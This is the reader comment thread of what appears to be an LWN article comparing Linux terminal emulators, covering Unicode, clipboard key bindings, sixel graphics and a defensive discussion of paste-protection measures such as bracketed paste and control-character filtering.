(How to handle RTL text in a terminal emulator is not obvious, and requires help from someone experienced with such languages.)
DomTerm does handle double-width CJK characters, and deals with input methods (IME).
Paste protection: Bracketed-paste-mode is supported: 'without:' x; with, 2nd box ok (on domterm 1.0.1).
Tabs and profiles: Supports tabs (and tiling). Some support for profiles - see Session-specific styles.
Eye candy: Backgounds: yes. Transparency: no. True-color: yes. URL: yes (also FILE:LINE: in error message opens file in editor). Text-wrap: yes. Scrollback: yes.
Daemon: the domterm command deamonizes itself by default
cool-retro-term
Posted Apr 2, 2018 5:47 UTC (Mon) by tzafrir (subscriber, #11501) [Link]
So I tried it again just long enough not to feel sick. It does show all the characters in the magic string. No bidi ordering, though. It seems to have "true color" (true grayscale, that is. Or orange-scale in the profile I was using). I didn't bother checking for for paste protection. It does not seem to have a key combination for paste.
cool-retro-term
Posted Apr 14, 2018 8:20 UTC (Sat) by johnny (guest, #10110) [Link]
A look at terminal emulators, part 1
Posted Apr 2, 2018 13:31 UTC (Mon) by ermo (subscriber, #86690) [Link]
What did I miss?
A look at terminal emulators, part 1
Posted Apr 2, 2018 14:44 UTC (Mon) by pspinler (subscriber, #2922) [Link]
Disclaimer: I did no testing to look for ways to bypass either a 'paste into an editor' or a 'review in clipboard manager' review method.
-- Pat
Terminals supporting text wrap?
Posted Apr 2, 2018 14:24 UTC (Mon) by EV (subscriber, #5528) [Link]
Terminals supporting text wrap?
Posted Apr 2, 2018 14:45 UTC (Mon) by zdzichu (subscriber, #17118) [Link]
It's implemented in VTE, so any VTE-using terminal should be able to do it.
Terminals supporting text wrap?
Posted Apr 2, 2018 18:11 UTC (Mon) by EV (subscriber, #5528) [Link]
Terminals supporting text wrap?
Posted Apr 22, 2018 21:47 UTC (Sun) by jcs (guest, #102320) [Link]
A look at terminal emulators, part 1
Posted Apr 2, 2018 17:08 UTC (Mon) by xtifr (subscriber, #143) [Link]
* Unicode support: excellent, as you might expect. Supports bidi, and right-justifies rtl text.
* Paste protection: not strong.
* Tabs & profiles: outstanding support (including tiling) though it may require some configuration tweaks. But you have the full power of elisp for playing around.
* Eyecandy: No truecolor support *at all*. It's an ANSI terminal.
* Performance: It's written in elisp. Of course it's slow. :)
A look at terminal emulators, part 1
Posted Apr 2, 2018 19:47 UTC (Mon) by tytso (✭ supporter ✭, #9993) [Link]
Thanks!
power consumption: suggestions welcome
Posted Apr 3, 2018 14:19 UTC (Tue) by anarcat (subscriber, #66354) [Link]
so how do you measure power consumption of a given process anyways? assume i know about powertop and that it's not a good answer (because it's not a batch program).
i would have assumed that the sum of "I/O + memory + CPU usage" would be a good metric of power consumption...
power consumption: suggestions welcome
Posted Apr 3, 2018 16:44 UTC (Tue) by tytso (✭ supporter ✭, #9993) [Link]
A look at terminal emulators, part 1
Posted Apr 2, 2018 20:18 UTC (Mon) by meyert (subscriber, #32097) [Link]
Clipboard selection
Posted Apr 3, 2018 5:41 UTC (Tue) by eru (subscriber, #2753) [Link]
One property of the various terminals you might comment on is: Can you copy text to "clipboard" and back? This is one messy aspect of X11. The classic xterm seems to support only "primary selection", and a few years ago I found this is problem because some applications expect the data to be pasted only in "clipboard". So I reluctantly started to use XFCE-4-Terminal, where ctrl-shift-C places the selected data there.
(By the way, the stuff about pasting innocent-looking evil texts literally gave me a nightmare, where I tried one of the examples, and it infected my computer with ransomware... should not to read lwn.net in the bed just before sleeping...)
Clipboard selection
Posted Apr 5, 2018 10:09 UTC (Thu) by grawity (subscriber, #80596) [Link]
You can actually bind the same keys in xterm via ~/.Xresources:
XTerm*vt100.translations: #override \n\ Shift Ctrl <Key>C: copy-selection(CLIPBOARD) \n\ Shift Ctrl <Key>V: insert-selection(CLIPBOARD) \n\ Shift Ctrl <Key>N: spawn-new-terminal() \n
(If you wanted to do the same in urxvt, you would need to load a perl script into it.)
Clipboard selection
Posted Apr 7, 2018 11:05 UTC (Sat) by eru (subscriber, #2753) [Link]
Thanks! Now I can go back to the One True Terminal Emulator. Only problem is some of that stuff is not supported on older xterm versions. The copy-selection appears in patch Patch #267 - 2010/11/20 (https://invisible-island.net/xterm/xterm.log.html), the RHEL/CentOS bundled ones (which I often need to use) may be older, depending on the particular RHEL version. But on non-ancient distributions your solution works fine.
Clipboard selection
Posted Apr 17, 2018 19:26 UTC (Tue) by Ross (subscriber, #4065) [Link]
Alt <KeyPress>c: select-set(CLIPBOARD)\n\
Alt <KeyPress>v: insert-selection(CLIPBOARD)\n\
If you like to use PRIMARY selections (highlight/middle-click), you might find that alt-spacebar is a convenient way to paste:
Alt <KeyPress>space: insert-selection(PRIMARY,CUT_BUFFER0)\n\
(CUT_BUFFER0 is a fallback there to the old cut buffer system which is useless except it works after the source window has been closed if it supports cut buffers, which xterm does)
A look at terminal emulators, part 1
Posted Apr 3, 2018 12:34 UTC (Tue) by kugel (subscriber, #70540) [Link]
Tilix
Posted Apr 3, 2018 13:32 UTC (Tue) by jle17 (guest, #110830) [Link]
Tilix (briefly mentionned at the end) as a similar feature ("Always use advanced paste dialog" in Preferences > General.
Tilix
Posted Apr 3, 2018 18:04 UTC (Tue) by fdrs (subscriber, #85858) [Link]
Tilix
Posted Apr 5, 2018 4:52 UTC (Thu) by pj (subscriber, #4506) [Link]
A look at terminal emulators, part 1
Posted Apr 5, 2018 19:34 UTC (Thu) by MatyasSelmeci (subscriber, #86151) [Link]
I know it's out of scope for your article, but the best terminal emulator I've found is iTerm2, which is only available on macOS (which I find a little sad). My favorite feature of it is tmux integration, where if you start up tmux in control mode (`tmux -CC'), then tmux manages the underlying terminal so it can resume after a disconnect, but iTerm2 makes it look and feel like a native window, so scrollback, search, and copy/paste work as usual. To my knowledge, iTerm2 is the only terminal that supports that.
A look at terminal emulators, part 1
Posted Apr 6, 2018 9:44 UTC (Fri) by agateau (subscriber, #57569) [Link]
A look at terminal emulators, part 1
Posted Apr 10, 2018 7:48 UTC (Tue) by jospoortvliet (subscriber, #33164) [Link]
Any terminal that doesn't support it - out as far as I am concerned ;-)
A look at terminal emulators, part 1
Posted Apr 7, 2018 14:09 UTC (Sat) by ianmcc (subscriber, #88379) [Link]
/s
A look at terminal emulators, part 1
Posted Apr 8, 2018 9:41 UTC (Sun) by flussence (subscriber, #85566) [Link]
A look at terminal emulators, part 1
Posted Apr 10, 2018 10:49 UTC (Tue) by dud225 (subscriber, #114210) [Link]
Alternative ROXTerm, sakura
Posted Apr 10, 2018 20:16 UTC (Tue) by flohoff (subscriber, #32900) [Link]
I was using ROXTerm for ages as it had drag and drop of tabs between Windows which is a nice way to sort the different tasks i am working on. Another plus was font size handling. I am always switching font sizes depending on the amount of visibility needed. Mails in 24pt - C++ in 9pt .. gnome-terminal got this all wrong only switching font-size in one of the tabs so switching tabs would either resize the window or resize columns/rows. ROXTerm got this all right and worked like a charm.
Sadly it has been removed from Debian as IIRC a gnome3/vte incompatibility led the Author to stop working on it.
I had a couple of days trying to get used to gnome-terminal when i moved to Stretch and it still was a PITA. So i had a look and settled with sakura. Font size handling is perfect - its lacking drag and drop - the only feature i am missing.
Flo
Alternative ROXTerm, sakura
Posted Apr 21, 2018 0:03 UTC (Sat) by smokeing (guest, #53685) [Link]
I can second that. Another feature I found particularly useful was customisable profiles.
Small nitpick re: Konsole
Posted Apr 12, 2018 10:26 UTC (Thu) by einar (guest, #98134) [Link]
A look at terminal emulators, part 1
Posted Apr 15, 2018 7:58 UTC (Sun) by mcortese (guest, #52099) [Link]
I tried st, but soon discovered that many keys change their behavior when CapsLock is on. For example, Backspace generates ^H instead of ^? (which, in my .inputrc is configured to delete words instead of characters), Function keys stop working, Ctrl+arrows generate different CSI sequences and no longer do what they are bound to, etc.
Terminal color history
Posted Apr 17, 2018 8:12 UTC (Tue) by Ross (subscriber, #4065) [Link]
the later DEC graphics terminals supported color as well, but not through the escape codes which are used to color text today. I don't think any DEC terminal supported 256 simultaneous colors, though maybe the VT340+ did (exactly what the "+" stands for is unclear to me, but at least one old post claimed it was for a larger palette).
I don't know the history for non-DEC terminals very well, but at least the early vector terminals didn't support color and as you can imagine that would be quite a challenge so I'm not sure any of them ever did.
Using fish for paste protection
Posted Apr 17, 2018 11:25 UTC (Tue) by Glandos (guest, #62733) [Link]
It has an excellent solution for paste protection: the text is simply displayed on multiple lines. Only a real hit on the Enter key executes the command.
Of course, it is not a readline-based shell. But that was really useful for me, more than one time. Especially when the paste buffer contains wrong values from a previous copy I forgot about.
XTerm and glyphs
Posted Apr 17, 2018 19:17 UTC (Tue) by Ross (subscriber, #4065) [Link]
(One caveat on the above: XTerm can do its own box drawing characters if they are missing.)
Unfortunately few bitmap typefaces have really good coverage. If anyone has suggestions, especially ones likely to be in distributions already, I'm interested in hearing them.
Other features
Posted Apr 17, 2018 19:21 UTC (Tue) by Ross (subscriber, #4065) [Link]
* application escape mode -- speeds things up if you use vim for instance (no delay after hitting escape)
* sixel graphics (https://en.wikipedia.org/wiki/Sixel) -- I'm likely non-representative here as I've worked on adding this to XTerm
Other features
Posted Apr 17, 2018 19:45 UTC (Tue) by sfeam (subscriber, #2841) [Link]
sixel graphics in xterm's vt340 mode works really well, although I had to build from source to get full color support. The distro packages did not enable RGB color mode or even 256 indexed color mode. My interest was in using it for gnuplot output over a remote connection without tunneling a full X display pipe.
Other features
Posted Apr 17, 2018 20:22 UTC (Tue) by Ross (subscriber, #4065) [Link]
On package defaults, I was just replying about color matching logic and 256 vs. 24bit color support.
I don't know why --enable-direct-color isn't turned on in distributions. Virtually everyone is using a 16 or 24 bit true color display these days.
I think there are a ton of compile-time configuration knobs so it probably makes sense to review what distributions ship, but what they ship isn't always optimal.
Other features
Posted Apr 18, 2018 7:26 UTC (Wed) by zwenna (subscriber, #64777) [Link]
Other features
Posted Apr 19, 2018 5:02 UTC (Thu) by ewen (subscriber, #4772) [Link]
From the "vim" context, I'm assuming it's something like better handling of stand alone ESC character input (versus "escape sequences" that start with ESC and have other characters after them -- ANSI, VT220, etc). Presumably these cases are distinguished by, eg, a short timeout. But I hadn't come across specific terminal support (or lack of support) for them previously.
Ewen
Other features
Posted Apr 19, 2018 10:53 UTC (Thu) by Ross (subscriber, #4065) [Link]
I learned about it here: https://ttssh2.osdn.jp/manual/en/usage/tips/vim.html
So it's part of Tera Term, but I don't know where else it is implemented (if anywhere). The setting is private mode 7727 if that helps.
For reference, here's what the page says:
When the ESC key is pressed, Tera Term, xterm and other terminal emulator send the ESC(0x1b) key code. Also, when the cursor key and the function key is pushed, Tera Term sends the ESC key code. Therefore, the host application can not recognize whether the ESC key is pressed.
So, the vim waits for one second when the ESC key code is received to recognize what key is pressed. As a result, when a user presses the ESC key, the time for the insert mode exiting will be late for 1 second. This behavior can not be affected by enabling Changing cursor shape on entering and leaving into insert mode and Controlling IME.
Please use the Application Escape Mode to resolve this problem. When below contents is added in the .vimrc file, the insert mode is quickly exited after the ESC key is pressed.
let &t_SI .= "\e[?7727h"
let &t_EI .= "\e[?7727l"
inoremap <special> <Esc>O[ <Esc>
Other features
Posted Apr 20, 2018 2:45 UTC (Fri) by ewen (subscriber, #4772) [Link]
Presumably if the terminal application was carefully enough programmed it could distinguish "ESC key pressed" and "CTRL-[" pressed, and invoke the magic "application escape" code only in the "ESC key pressed" case, and not in the "CTRL-[" case, thus leaving CTRL-[ as an option to insert literal 0x1b characters (eg, CTRL-V CTRL-[).
Ewen
Other features
Posted Apr 24, 2018 23:45 UTC (Tue) by Liskni_si (subscriber, #91943) [Link]
A look at terminal emulators, part 1
Posted Apr 18, 2018 10:25 UTC (Wed) by georg.s (guest, #110733) [Link]
Your are mentioning the bracketed paste mode, but you don't tell the reader which of the tested terminals actually support it.
Similarly, you mention the test page, but don't report any test results against your set of terminals.
When you close with the urxvt confirm-plugin while omitting other protections implemented in other terminals (i.e. the default filtering of most non-printable characters implemented in xterm/vte since 2013/2015 which should be very effective against such paste attacks) the reader has to assume the worst: unless I'm using urxvt with confirm-plugin my terminal is vulnerable to this.
Thus, perhaps you want to add a note regarding the 2013/2015 improvements in xterm and vte based terminals.
Btw, is there a reason why your table is missing tilix while it's mentioned in the text?
A look at terminal emulators, part 1
Posted Apr 18, 2018 13:18 UTC (Wed) by anarcat (subscriber, #66354) [Link]
As-is, the 'Paste protection' section is quite misleading. Your are mentioning the bracketed paste mode, but you don't tell the reader which of the tested terminals actually support it. Similarly, you mention the test page, but don't report any test results against your set of terminals.That may have not been clear, but all the terminals in the list succeed the first test when bracked paste is enabled in libreadline, with applications that support it.
When you close with the urxvt confirm-plugin while omitting other protections implemented in other terminals (i.e. the default filtering of most non-printable characters implemented in xterm/vte since 2013/2015 which should be very effective against such paste attacks) the reader has to assume the worst: unless I'm using urxvt with confirm-plugin my terminal is vulnerable to this. Thus, perhaps you want to add a note regarding the 2013/2015 improvements in xterm and vte based terminals.There's only so much I can do. There are billion (and a half) odd features, corner cases and oddities in terminal emulators. And yes, some terminals have peculiar behavior with certain escape sequences that change titles or can execute arbitrary code. I forgot about that in my review. But if you scroll up to the other comments, you'll see it is actually worse than what you describe: urxvt is vulnerable even to some normal copy-paste bracketed mode *and* confirm-paste escapes.
Now, this is exactly what comments sections are for! :) Could you clarify exactly which improvements happened in xterm and vte to work around those issues and when?
Btw, is there a reason why your table is missing tilix while it's mentioned in the text?It's one of the terminals that didn't make the full review list. It's only mentioned as an aside, an alternative to Terminator. In the ever growing list of "not evaluated terminals", it's in the "too similar to other stuff", probably because it's like Terminator.
A look at terminal emulators, part 1
Posted Apr 20, 2018 8:28 UTC (Fri) by georg.s (guest, #110733) [Link]
As I wrote in my previous comment, the improvement in xterm and vte I'm referring to is the control character filtering (that is enabled, by default):
Implemented in xterm in 2013:
http://invisible-island.net/xterm/xterm.log.html#xterm_292
Implemented in vte in 2015:
https://bugzilla.gnome.org/show_bug.cgi?id=753197
This should protect against:
- escaping from a running `cat > /dev/null` (into a shell) when pasting something into that terminal (i.e. when using that terminal as a paste preview buffer)
- when pasting something into the insert mode of a console vim (running in a terminal), escaping into command mode or the shell
- injecting an end-of-paste-mode sequence in a paste when relying on the terminals bracketed paste mode
See also this Security SE answer: https://security.stackexchange.com/a/52655/42507
A look at terminal emulators, part 1
Posted Apr 21, 2018 18:44 UTC (Sat) by anarcat (subscriber, #66354) [Link]
I tested xterm 327 on Debian and 330 on Fedora. I have also tested GNOME Terminal 3.22.2 and 2.26.2 (against on Debian/Fedora). None were effective against the attacks if bracketed-paste was not enabled in the shell which is the default configuration in both cases. As documented, if bracketed paste is configured, then there is some protection, but I would argue that the protections shouldn't be application-specific: the terminal shouldn't dump random escape sequences on the terminal like this.So yes, maybe the article's text could have been more explicit about this, but I think I did my homework and tested the configurations you are referring to: I did not find them satisfactory.
Thanks for the updates, however!
A look at terminal emulators, part 1
Posted May 10, 2018 20:22 UTC (Thu) by georg.s (guest, #110733) [Link]
All 3 links I included in my last email clearly state that recent versions of xterm/gnome-terminal by default filter out most control characters, including escape. Basically only carriage return, newline, tab, backspace and del should get through.
Thus, if you paste some web-site content into a running `cat > /dev/null` you should be safe as an attacker can't escape (no pun intended!) from it. Similar story for a terminal editor. Also, an attacker isn't able to inject a end-bracket escape sequence into the pasted content (as the escape control character is filtered).
Thus, if you are really able to paste some supposedly filtered-out control characters you should open a bug report against xterm/gnome-terminal.
But I doubt it. See for example: https://georg.so/pub/cat.html
On Fedora 27, with gnome-terminal-3.26.1-1.fc27.x86_64 pasting this example into a `cat > /dev/null` doesn't terminate it. The control character is filtered out, as expected.
It's also filtered out in an xterm-330-3.fc27.x86_64 with default settings.
It isn't filtered out when I paste it into a `cat > /dev/null` inside a rxvt-unicode-9.22-6.fc27.x86_64 or an `xterm -xrm 'XTerm*vt100.AllowPasteControls: true'`. In those terminals the paste terminates the cat and the hidden command is executed.
Similar example: https://georg.so/pub/bash-vi.html
In this case an escape control character is included in the pasted content. Again, it's properly filtered with gnome-terminal and xterm. The escape from insert-mode in bash (with vi key bindings) only works with the rxvt-unicode and xterm/AllowPasteControls.
Also, I haven't explicitly configured zsh-5.4.1-2.fc27.x86_64 for bracketed paste mode - but pasting multiline input doesn't execute the lines in zsh - in contrast to bash. Apparently, it's enabled by default in recent zsh versions.
TI/TE disabling support
Posted Apr 22, 2018 11:36 UTC (Sun) by jafo (subscriber, #8892) [Link]
What if I don't want ANSI/VT-100?
Posted Apr 22, 2018 18:19 UTC (Sun) by jruschme (guest, #123864) [Link]
In a former life, I used to develop for a system where everything was hardcoded to Televideo terminals (basically, an enhanced ADM-3/3A). As microcomputers started to proliferate in our organization, there was a big push to identify programs which could let the PC emulate a Televideo, especially some of the special modes we used in our software. This is the kind of software I think of when I hear the term "terminal emulator".
Out of curiosity, do such packages still exist?
What if I don't want ANSI/VT-100?
Posted Apr 23, 2018 11:01 UTC (Mon) by nix (subscriber, #2304) [Link]
xterm itself can also emulate a Tektronix 4014, an early graphics terminal, but that was largely useful in the early days: other than gnuplot it's been decades since I saw anything that knew how to render any output on a Tektronix. If something wants to produce graphical output these days there are many better options. :)
What if I don't want ANSI/VT-100?
Posted Apr 24, 2018 22:28 UTC (Tue) by Ross (subscriber, #4065) [Link]
A look at terminal emulators, part 1
Posted Apr 24, 2018 22:40 UTC (Tue) by oak (guest, #2786) [Link]
An interesting test for functionality and performance is how well more advanced terminal based games work on it, for example "MyMan", a PacMan clone which supports colors, scrolling and special chars.
Copyright © 2018, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds
